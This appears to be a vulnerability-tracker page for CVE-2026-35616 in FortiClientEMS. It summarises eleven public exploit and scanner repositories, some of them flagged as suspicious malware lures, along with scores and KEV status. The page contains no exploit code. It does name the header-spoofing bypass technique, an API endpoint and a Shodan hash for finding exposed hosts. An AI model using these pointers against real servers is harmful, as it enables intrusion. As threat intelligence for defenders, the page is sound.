CVE-2026-35616

CRITICAL KEV NUCLEI

Fortinet FortiClientEMS 7.4.5-7.4.6 - Command Injection

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2026-35616 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added April 6, 2026. EIP tracks 11 public exploits from researchers including Alaatk, Hex0rc1st, jenniferreire26. A Nuclei detection template is also available.

AI-analyzed exploit summary This repository contains a functional Python exploit for CVE-2026-35616, an authentication bypass vulnerability in FortiClient EMS. The exploit forges a certificate and manipulates HTTP headers to bypass authentication and access protected API endpoints.

Description

A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.

Exploits (11)

nomisec WORKING POC 2 stars
by Alaatk · remote
https://github.com/Alaatk/CVE-2026-35616

This repository contains a functional Python exploit for CVE-2026-35616, an authentication bypass vulnerability in FortiClient EMS. The exploit forges a certificate and manipulates HTTP headers to bypass authentication and access protected API endpoints.

Classification
Working Poc 95%
Attack Type
Auth Bypass
Complexity
Moderate
Reliability
Reliable
Target: FortiClient EMS 7.4.5, 7.4.6
No auth needed
Prerequisites: Python 3 · requests · urllib3 · cryptography · openssl
devstral-2 · analyzed Apr 19, 2026 Full analysis →
github SUSPICIOUS
by jenniferreire26 · poc
https://github.com/jenniferreire26/CVE-2026-35616

The repository claims to exploit CVE-2026-35616 (Fortinet FortiClientEMS unauthenticated stored XSS) but provides no actual exploit code. Instead, it directs users to an external download link (tinyurl.com), which is a common tactic for malicious or fake PoCs.

Classification
Suspicious 90%
Attack Type
Xss
Complexity
Theoretical
Reliability
Theoretical
Target: Fortinet FortiClientEMS 7.4.5-7.4.6
No auth needed
Prerequisites: none listed
devstral-2 · analyzed Jun 09, 2026 Full analysis →
github SUSPICIOUS
by jennydokumi30 · poc
https://github.com/jennydokumi30/CVE-2026-35616

The repository lacks actual exploit code and instead directs users to an external download link (tinyurl.com), which is a common tactic for distributing malware or fake exploits. The README provides minimal technical details and reads more like a sales pitch.

Classification
Suspicious 95%
Attack Type
Xss
Complexity
Theoretical
Reliability
Theoretical
Target: Fortinet FortiClientEMS 7.4.5 through 7.4.6
No auth needed
Prerequisites: none specified
devstral-2 · analyzed May 31, 2026 Full analysis →
github STUB
by HORKimhab · poc
https://github.com/HORKimhab/CVE-2026-35616

The repository contains only placeholder files (README.md, LICENSE, .gitignore, and a template file) with no actual exploit code or technical details about CVE-2026-35616. The README is a generic template with no specific information about the vulnerability.

Classification
Stub 95%
Attack Type
Other
Complexity
Theoretical
Reliability
Theoretical
Target: unknown
No auth needed
devstral-2 · analyzed May 28, 2026 Full analysis →
nomisec WORKING POC
by wa6n3r · infoleak
https://github.com/wa6n3r/CVE-2026-35616

This repository contains a functional exploit for CVE-2026-35616, which bypasses certificate chain validation in Fortinet API. The script automates the discovery of valid Common Names (CNs), forges a fake client certificate, and performs requests to protected endpoints using specific headers.

Classification
Working Poc 95%
Attack Type
Auth Bypass
Complexity
Moderate
Reliability
Reliable
Target: Fortinet API
No auth needed
Prerequisites: Python 3.8+ · requests · cryptography · urllib3 · openssl (optional)
devstral-2 · analyzed Apr 21, 2026 Full analysis →
nomisec SCANNER
by keraattin · poc
https://github.com/keraattin/CVE-2026-35616

This repository contains a Python script that detects CVE-2026-35616, an improper access control vulnerability in FortiClient EMS 7.4.5-7.4.6. The script checks for authentication bypass by spoofing the X-SSL-CLIENT-VERIFY header and comparing HTTP responses.

Classification
Scanner 95%
Attack Type
Auth Bypass
Complexity
Moderate
Reliability
Reliable
Target: FortiClient EMS 7.4.5, 7.4.6
No auth needed
Prerequisites: network access to target FortiClient EMS instance
devstral-2 · analyzed Apr 14, 2026 Full analysis →
nomisec SCANNER
by BishopFox · poc
https://github.com/BishopFox/CVE-2026-35616-check

This repository contains a non-destructive vulnerability scanner for CVE-2026-35616, an API authentication bypass in FortiClient EMS 7.4.5 and 7.4.6. The tool detects the vulnerability by comparing server responses to baseline and spoofed HTTP header requests.

Classification
Scanner 100%
Attack Type
Auth Bypass
Complexity
Trivial
Reliability
Reliable
Target: FortiClient EMS 7.4.5, 7.4.6
No auth needed
Prerequisites: Accessible FortiClient EMS web interface · Endpoint `/api/v1/fabric_device_auth/fortigate/init` exists
devstral-2 · analyzed Apr 07, 2026 Full analysis →
nomisec SCANNER
by fevar54 · poc
https://github.com/fevar54/CVE-2026-35616-detector.py

This repository contains a Python-based scanner that detects CVE-2026-35616, an improper access control vulnerability in FortiClient EMS versions 7.4.5 through 7.4.6. The tool checks for missing authentication on critical API endpoints and reports if they are accessible without credentials.

Classification
Scanner 100%
Attack Type
Auth Bypass
Complexity
Trivial
Reliability
Reliable
Target: FortiClient EMS 7.4.5 through 7.4.6
No auth needed
Prerequisites: network access to the target FortiClient EMS server
devstral-2 · analyzed Apr 07, 2026 Full analysis →
nomisec SUSPICIOUS
by z3r0h3ro · poc
https://github.com/z3r0h3ro/CVE-2026-35616-poc

The repository claims to provide an exploit for CVE-2026-35616 but lacks actual exploit code, instead directing users to an external download link (tinyurl.com). The README is vague and uses marketing language without technical details.

Classification
Suspicious 95%
Attack Type
Rce
Complexity
Theoretical
Reliability
Theoretical
Target: FortiClient EMS 7.4.5 - 7.4.6
No auth needed
Prerequisites: Python 3.8+ · requests · pyyaml · argparse
devstral-2 · analyzed Apr 07, 2026 Full analysis →
nomisec SCANNER
by 0xBlackash · poc
https://github.com/0xBlackash/CVE-2026-35616

This repository contains a Nuclei template and Python script designed to detect CVE-2026-35616, an authentication bypass vulnerability in FortiClient EMS. The tools perform safe checks by sending unauthenticated requests to sensitive API endpoints and analyzing responses for indicators of vulnerability.

Classification
Scanner 95%
Attack Type
Auth Bypass
Complexity
Trivial
Reliability
Reliable
Target: FortiClient EMS 7.4.5 through 7.4.6
No auth needed
Prerequisites: Network access to the target FortiClient EMS instance
devstral-2 · analyzed Apr 07, 2026 Full analysis →

Nuclei Templates (1)

FortiClient EMS - Authentication Bypass
HIGHVERIFIEDby ritikchaddha
Shodan: http.favicon.hash:-800551065

References (2)

Core 2

Scores

CVSS v3 9.8
EPSS 0.3565
EPSS Percentile 97.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation active
Automatable yes
Technical Impact total

Details

CISA KEV 2026-04-06
VulnCheck KEV 2026-04-04
ENISA EUVD EUVD-2026-18963
CWE
CWE-284
Status published
Products (3)
fortinet/forticlientems 7.4.5
fortinet/forticlientems 7.4.6
Fortinet/FortiClientEMS 7.4.5 - 7.4.6
Published Apr 04, 2026
KEV Added Apr 06, 2026
Tracked Since Apr 04, 2026